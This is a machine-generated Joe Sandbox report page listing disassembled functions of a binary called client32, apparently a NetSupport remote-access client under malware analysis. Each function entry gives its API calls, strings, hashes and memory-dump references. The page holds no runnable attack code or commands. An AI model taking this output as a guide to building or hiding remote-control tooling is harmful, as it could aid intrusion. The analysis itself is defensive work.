Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CountTick
String ID: General$TicklePeriod
API String ID: 536389180-1546705386
Opcode ID: 583a630acb21db53e34cc03cdf69896ea0eaf712d7d07d60b781f99cd72e8e82
Instruction ID: df9d0f281d17993452c850789e07539b87313039e6a264bd0b80c81d914ed6ef
Opcode Fuzzy Hash: 583a630acb21db53e34cc03cdf69896ea0eaf712d7d07d60b781f99cd72e8e82
Instruction Fuzzy Hash: FE516234A00705DFE764CF68C994B9AB7E9FB44300F1085AEE55A8B381EB71BA45CB91

Function 1103D1F0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 30windowCOMMON

Download Yara Rule

APIs

Part of subcall function 11110920: EnterCriticalSection.KERNEL32(00000010,00000000,771B23A0,1100BF7B), ref: 11110928
Part of subcall function 11110920: LeaveCriticalSection.KERNEL32(00000010), ref: 11110935

_free.LIBCMT ref: 1103D221

Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD

Part of subcall function 11110920: LeaveCriticalSection.KERNEL32(00000010,?), ref: 11110970

SetPriorityClass.KERNEL32(?,?), ref: 1103D24C
MessageBeep.USER32(00000000), ref: 1103D25E

Strings

Show has overrun too much, aborting, xrefs: 1103D1F1

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$Leave$BeepClassEnterErrorFreeHeapLastMessagePriority_free
String ID: Show has overrun too much, aborting
API String ID: 304545663-4092325870
Opcode ID: 38cbc4052beda61ee506a84b884a1a9d6557445bc312e3507d1d7bbe4ecf2d69
Instruction ID: 9026de0c3b0683949d6f7ac94f5710338a9a532b2cd303e3c01edb637dee248d
Opcode Fuzzy Hash: 38cbc4052beda61ee506a84b884a1a9d6557445bc312e3507d1d7bbe4ecf2d69
Instruction Fuzzy Hash: 50F0B4B4B016139BFB59CBB08914BD9F69DBF8071DF000118E92C97280EB70B224C7D2

Function 1101D3C0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 1101D3EB
EnableWindow.USER32(00000000,?), ref: 1101D3F6

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

m_hWnd, xrefs: 1101D3D6
e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h, xrefs: 1101D3D1

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: EnableErrorExitItemLastMessageProcessWindowwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
API String ID: 1136984157-1986719024
Opcode ID: bd8169d8b1d2f1da16aa56a8743fe70e232c658d653b50b5f908e1dbd2e13666
Instruction ID: 36c1a6ee6805b1b90e48090b7f41ce0c53d42d7852bf61e64861d4a713bbcb04
Opcode Fuzzy Hash: bd8169d8b1d2f1da16aa56a8743fe70e232c658d653b50b5f908e1dbd2e13666
Instruction Fuzzy Hash: E3E0867950022DBFC7149E91DC85EAAF35CEB44269F00C135F96656644D674E84087A4

Function 11049130 Relevance: 6.1, APIs: 4, Instructions: 112windowtimeCOMMON

Download Yara Rule

APIs

Part of subcall function 11040700: IsWindow.USER32(?), ref: 11040720
Part of subcall function 11040700: GetClassNameA.USER32(?,?,00000040), ref: 11040731

_malloc.LIBCMT ref: 110491DD
_memmove.LIBCMT ref: 110491EA
SendMessageTimeoutA.USER32(?,0000004A,0002045A,?,00000002,00001388,?), ref: 11049224
_free.LIBCMT ref: 1104922B

Part of subcall function 11048FE0: wsprintfA.USER32 ref: 11049013
Part of subcall function 11048FE0: WaitForInputIdle.USER32(?,00002710), ref: 11049099
Part of subcall function 11048FE0: CloseHandle.KERNEL32(?), ref: 110490AC
Part of subcall function 11048FE0: CloseHandle.KERNEL32(?), ref: 110490B5
Part of subcall function 11048FE0: Sleep.KERNEL32(00000014), ref: 110490D1

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseHandle$ClassIdleInputMessageNameSendSleepTimeoutWaitWindow_free_malloc_memmovewsprintf
String ID:
API String ID: 176360892-0
Opcode ID: ff22a9ddfc9956f02424ec2608c6f13a06eca4d3def8f93d8689db34ce88e07c
Instruction ID: d41a6b91d128f2eeea48cc74d118894cce712679c930bdd2d1ac7c58a8e7d684
Opcode Fuzzy Hash: ff22a9ddfc9956f02424ec2608c6f13a06eca4d3def8f93d8689db34ce88e07c
Instruction Fuzzy Hash: 60316075E0061AABDB04DF94CD81BEEB3B8FF48718F104179E915A7684E731AE05CBA1

Function 11143070 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

SetBkColor.GDI32(?,?), ref: 11143091
SetRect.USER32(?,?,?,?,?), ref: 111430A9
ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 111430C0
SetBkColor.GDI32(?,00000000), ref: 111430C8

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Color$RectText
String ID:
API String ID: 4034337308-0
Opcode ID: 26f6cc05d1df662940a62fe5a538b52049d671c1388398b7ccd782556aa038f2
Instruction ID: e9225e88152d902865c43eb673e3150d6d7e7d22167fd17714d79550e5345a2a
Opcode Fuzzy Hash: 26f6cc05d1df662940a62fe5a538b52049d671c1388398b7ccd782556aa038f2
Instruction Fuzzy Hash: 0C012C7264021CBBDB04DEA8DD81FEFB3ACEF49604F104159FA15A7280DAB0AD018BA5

Function 1115F1F0 Relevance: 6.0, APIs: 4, Instructions: 26COMMON

Download Yara Rule

APIs

GlobalDeleteAtom.KERNEL32(00000000), ref: 1115F208
GlobalDeleteAtom.KERNEL32 ref: 1115F212
GlobalDeleteAtom.KERNEL32 ref: 1115F21C
SetWindowLongA.USER32(?,000000FC,?), ref: 1115F22C

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AtomDeleteGlobal$LongWindow
String ID:
API String ID: 964255742-0
Opcode ID: 6d1c3e4c7ba79be894aa668b9e160f569f6102aeba86935b87fce5edf1bf1130
Instruction ID: 220dc2ec1870e2cd5bb434e19042b50d90bfbecd9004e1d9cbcb935e023cb0cc
Opcode Fuzzy Hash: 6d1c3e4c7ba79be894aa668b9e160f569f6102aeba86935b87fce5edf1bf1130
Instruction Fuzzy Hash: 97E065B910423697C7149F6AAC40D72F3ECAF98614715452DF175C3594C778D445DB70

Function 1103B150 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97COMMON

Download Yara Rule

APIs

_calloc.LIBCMT ref: 1103B162
_free.LIBCMT ref: 1103B25B

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

CLTCONN.CPP, xrefs: 1103B175

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitLastMessageProcess_calloc_freewsprintf
String ID: CLTCONN.CPP
API String ID: 183652615-2872349640
Opcode ID: 8337f5e747ebaeb2686f90dd4bebe07236585bab06edcc3415c76220b6505581
Instruction ID: 20d7259e8fe77d3daff0af84d5ff1d15e913130fc2269d1c6afd747bd8efee53
Opcode Fuzzy Hash: 8337f5e747ebaeb2686f90dd4bebe07236585bab06edcc3415c76220b6505581
Instruction Fuzzy Hash: F231C875A10B069AD310CF95C881BB7F3E4FF44318F048669E9598B641F774F905C3A5

Function 110AD1B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 110AD1E3

Part of subcall function 110ACEB0: LoadLibraryA.KERNEL32(Winscard.dll,00000000,00000000,110AD1F3,00000000,00000001,00000000,?,11185738,000000FF,?,110ADC42,?,?,00000200,?), ref: 110ACEC4
Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(00000000,SCardEstablishContext), ref: 110ACEE1
Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardReleaseContext), ref: 110ACEEE
Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardIsValidContext), ref: 110ACEFC
Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardListReadersA), ref: 110ACF0A
Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardGetStatusChangeA), ref: 110ACF18
Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardCancel), ref: 110ACF26
Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardFreeMemory), ref: 110ACF34
Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardConnectA), ref: 110ACF42
Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardDisconnect), ref: 110ACF50
Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardGetAttrib), ref: 110ACF5E
Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardControl), ref: 110ACF6C
Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardListCardsA), ref: 110ACF7A
Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardGetCardTypeProviderNameA), ref: 110ACF88
Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardBeginTransaction), ref: 110ACF96
Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardEndTransaction), ref: 110ACFA4
Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardReconnect), ref: 110ACFB2

FreeLibrary.KERNEL32(00000000,?,110ADC42,?,?,00000200,?,?,00000400,?,110F4A31,00000000,00000000,?,?,?), ref: 110AD252

Strings

winscard.dll is NOT valid!!!, xrefs: 110AD1FD

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressProc$Library$FreeLoad_memset
String ID: winscard.dll is NOT valid!!!
API String ID: 212038770-1939809930
Opcode ID: 2490663d4c0d4ec01f8a7efd0df3ebe9692d3296733f7b5ae7fba3cdb2ac2a80
Instruction ID: 57730f506c13caa9e6db9d6f73070caca170ae8d01d94efb838e03e2302413b1
Opcode Fuzzy Hash: 2490663d4c0d4ec01f8a7efd0df3ebe9692d3296733f7b5ae7fba3cdb2ac2a80
Instruction Fuzzy Hash: 6521B3B6D40629ABDB10CF95DC44EEFFBB8EB45660F00861AFC15A3340D631A904CBE0

Function 110391C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 110CF130: GetDlgItem.USER32(?,000017DD), ref: 110CF18A
Part of subcall function 110CF130: ShowWindow.USER32(00000000,00000000), ref: 110CF1AF
Part of subcall function 110CF130: GetWindowRect.USER32(00000000,?), ref: 110CF1DD
Part of subcall function 110CF130: GetObjectA.GDI32(00000000,0000003C,?), ref: 110CF21D
Part of subcall function 110CF130: GetWindowTextA.USER32(00000000,?,00000100), ref: 110CF276

Part of subcall function 110CB9E0: GetDlgItemTextA.USER32(?,?,?,00000400), ref: 110CBA0C
Part of subcall function 110CB9E0: SetDlgItemTextA.USER32(?,?,00000000), ref: 110CBA30

SetDlgItemTextA.USER32(?,000004BC,?), ref: 11039202
_memset.LIBCMT ref: 11039216

Strings

124406, xrefs: 1103922B

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ItemText$Window$ObjectRectShow_memset
String ID: 124406
API String ID: 3037201586-3922861981
Opcode ID: 2bc1dfb5218c02c431ab83e71b2dcb76f085101561c9e5be1cea2ac4dddf3c12
Instruction ID: 4133adfa845279c2267cfda8ab6a139ff56e83a68c49f32f67e71b8829282469
Opcode Fuzzy Hash: 2bc1dfb5218c02c431ab83e71b2dcb76f085101561c9e5be1cea2ac4dddf3c12
Instruction Fuzzy Hash: E5119675740614AFE720DB68CC81FDAB7E8EF48704F004588F6089B280DBB1FA41CB95

Function 11015030 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00000000,00001006,00000000,?), ref: 1101509D

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

m_hWnd, xrefs: 11015049
e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 11015044

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$ErrorExitLastProcessSendwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
API String ID: 819365019-3966830984
Opcode ID: 815180139f2bb1a06bb201446d8668dccf0e5584833ed039e0ec19942fc9e912
Instruction ID: f09b96a616f6a33d867b0b5af4e6941d1959c252ec7f828cb2a239631c18db6c
Opcode Fuzzy Hash: 815180139f2bb1a06bb201446d8668dccf0e5584833ed039e0ec19942fc9e912
Instruction Fuzzy Hash: 1701A2B1D10219AFCB90CFA9C8457DEBBF4AB0C310F10816AE519F6240E67556808F94

Function 1115F340 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 31COMMON

Download Yara Rule

APIs

SetPropA.USER32(?,?,?), ref: 1115F395

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

p->m_hWnd, xrefs: 1115F372
..\ctl32\wndclass.cpp, xrefs: 1115F350, 1115F36D

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitLastMessageProcessPropwsprintf
String ID: ..\ctl32\wndclass.cpp$p->m_hWnd
API String ID: 1134434899-3115850912
Opcode ID: 538790263cfb1f25c099da663b992418a3413831744957c6e7e8603356e21433
Instruction ID: 87c86bef28f98f72f88127ca4e69caffea3bfce03f9a6da2004c13aaf4101256
Opcode Fuzzy Hash: 538790263cfb1f25c099da663b992418a3413831744957c6e7e8603356e21433
Instruction Fuzzy Hash: FCF0E575BC0336B7D7509A66DC82FE6F358D722BA4F448016FC26A2141F274E980C2D2

Function 110151E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00000000,0000102D,00000000,?), ref: 11015229

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

m_hWnd, xrefs: 110151F9
